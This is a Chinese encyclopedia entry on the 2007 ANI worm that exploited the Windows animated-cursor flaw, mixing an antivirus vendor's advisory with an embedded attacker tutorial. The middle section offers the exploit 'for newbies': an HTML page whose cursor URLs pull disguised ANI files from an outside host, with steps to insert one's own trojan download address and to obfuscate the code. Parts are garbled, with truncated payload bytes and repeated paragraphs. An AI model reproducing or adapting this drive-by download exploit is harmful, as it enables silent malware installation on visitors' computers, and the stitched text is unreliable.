请输入您要查询的百科知识:

 

词条 ani蠕虫病毒
释义

§ 病毒简介

ani蠕虫病毒与“熊猫烧香”非常相似的高危病毒,命名为“ANI蠕虫(Worm.DlOnlineGames.a)”。

该病毒不光传播和危害方式与“熊猫烧香”病毒非常相似,还利用了上周末才刚出现的Vista、XP等操作系统的ANI高危漏洞。根据瑞星客户服务中心的统计,短短24小时内,已接到大量用户的求助。鉴于该病毒可能会广泛传播并且危害较为严重,瑞星发出今年第一个“橙色安全警报”(二级)。

瑞星反病毒专家分析,被“ANI蠕虫”感染的电脑会从网上下载多种木马(木马查杀软件下载)、后门病毒,使得用户游戏等账号被盗,或者电脑变成被黑客控制的“肉鸡”。同时,染毒电脑还会发出大量带毒邮件,邮件的题目是:“你和谁视频的时候被拍下的?给你笑死了!”邮件内容为“看你那小样!我看你是出名了!你看这个地址!你的脸拍的那么清楚!你变明星了!http://****.microfsot.com/***/134952.htm”,收到邮件的用户点击这个网址就会被感染。

病毒作者使用国内某网站的邮箱散发病毒,并且邮件内容也为中文,因此基本可以确定该病毒为国人编写。此外,该病毒跟“熊猫烧香”病毒一样,也会感染网页文件并加入病毒代码。如果网站编辑的计算机被该病毒感染,将网页文件上传到网站,那么访问该网站用户就会被感染。

更为严重的是,“熊猫烧香”利用的是老的系统漏洞,用户安装好系统补丁就可防范;而“ANI蠕虫”病毒则采用了上周才被发现的ANI漏洞进行传播,该漏洞存在于Windows Vista、XP等主流操作系统中,目前微软还没有提供补丁程序。

针对此恶性病毒,瑞星杀毒软件已经升级,19.16.60版本以上即可对其进行彻底查杀。瑞星安全专家提醒广大用户,除了升级杀毒软件、打开实时监控以外,上网时还应该打开个人防火墙,阻止病毒自动下载恶意程序。

ani网马生成器

1、病毒作者制作恶意ANI文件,使其能下载其它的病毒或木马程序;

2、病毒作者会将ANI文件更名为Jpeg、Bmp、Gif等常见图片文件放到网页中;

3、当用户利用IE浏览器访问这些网页时会自动将该ANI文件下载到本地;

4、IE浏览器在打开该ANI文件时,即可触发漏洞,并立即下载和执行其它的病毒或木马程序。

目前微软尚未公布ani漏洞的处理办法,请各位电脑用户这段时间避免进入一些陌生网站!

这个漏洞是Microsoft Windows Cursor and Icon Format Remote Code Execution (0day)   为了方便广大菜鸟 特发出此漏洞的代码和使用方法!以下就是了~

代码没有经过加密,所以大家需要自行加密了,加密很简单把这段代码用ASCII字符替换就行了!“测试文件.htm”代码如下:

(使用记事本打开编辑即可)

将这段代码:

【Copy to clipboard】CODE:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD>

<META http-equiv=Content-Type content="text/html; charset=big5">

<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>

<BODY>

<DIV style="CURSOR: url('http://www.exediy.cn/a.jpg';)">

<DIV

style="CURSOR: url('http://www.exediy.cn/b.jpg';)"></DIV></DIV></BODY></HTML>

先把那两个“http://www.exediy.cn/”改为你的FTP空间地址,就是你上传a.jpg 和b.jpg 文件的地址,然后用ASCII代码加密,加密然后复制--粘贴,替换掉原来的相应代码就行了--保存。

剩下需要更改的就是 a.jpg和b.jpg 这两个文件,大家用“记事本”分别打开这两个JPG文件,然后可以看到最后面为“http://www.exediy.cn/a.exe” 这两个文件后面都是这个地址,现在大家可以把这个地址替换掉!比如你的木马地址为“http://www.xxx.com/163.exe” 我们就将这两个文件中的地址都替换为“http://www.xxx.com/163.exe”

替换后如下:

【Copy to clipboard】CODE:

RIFF    ACONanih$   $

============================================================================================================

更为严重的是,“熊猫烧香”利用的是老的系统漏洞,用户安装好系统补丁就可防范;而“ANI蠕虫”病毒则采用了上周才被发现的ANI漏洞进行传播,该漏洞存在于Windows Vista、XP等主流操作系统中,目前微软还没有提供补丁程序。

针对此恶性病毒,瑞星杀毒软件已经升级,19.16.60版本以上即可对其进行彻底查杀。瑞星安全专家提醒广大用户,除了升级杀毒软件、打开实时监控以外,上网时还应该打开个人防火墙,阻止病毒自动下载恶意程序。

瑞星安全专家指出,该漏洞影响WindowsXP以上操作系统和IE6以上浏览器,微软最新Vista和IE7都不能幸免。这是Vista第一次爆出重大漏洞,“利用该漏洞传播病毒的网站正逐步增多,攻击代码很可能已公开”。

安全厂家提醒,普通网民不要轻易登陆陌生网站,尤其是通过电子邮件、聊天软件等发来的陌生网址;网站管理员则应加强对服务器日志管理,尤其要注意不明来源ANI及JPG等格式图片文件。此外,电脑用户应及时升级杀毒软件,上网时打开杀毒软件实时监控。

§ 相关词条

防毒

随便看

 

百科全书收录594082条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。

 

Copyright © 2004-2023 Cnenc.net All Rights Reserved
更新时间:2024/12/20 4:33:25